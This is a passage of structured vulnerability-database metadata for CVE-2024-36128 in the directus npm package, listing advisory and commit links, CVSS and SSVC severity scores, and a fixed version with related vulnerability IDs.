scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/
url https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-36128
reference_id CVE-2024-36128
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-36128
4
reference_url https://github.com/advisories/GHSA-632p-p495-25m5
reference_id GHSA-632p-p495-25m5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-632p-p495-25m5
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5
reference_id GHSA-632p-p495-25m5
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/
url https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5
fixed_packages
0
url pkg:npm/directus@10.11.2
purl pkg:npm/directus@10.11.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xc7t-gwaz-ckeu
6
vulnerability VCID-xt9c-32g5-mqes
7
vulnerability VCID-yutw-33sk-5fg3
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2
aliases CVE-2024-36128, GHSA-632p-p495-25m5
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yz34-qwam-wbcn
Fixing_vulnerabilities
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/directus@9.0.0-rc.64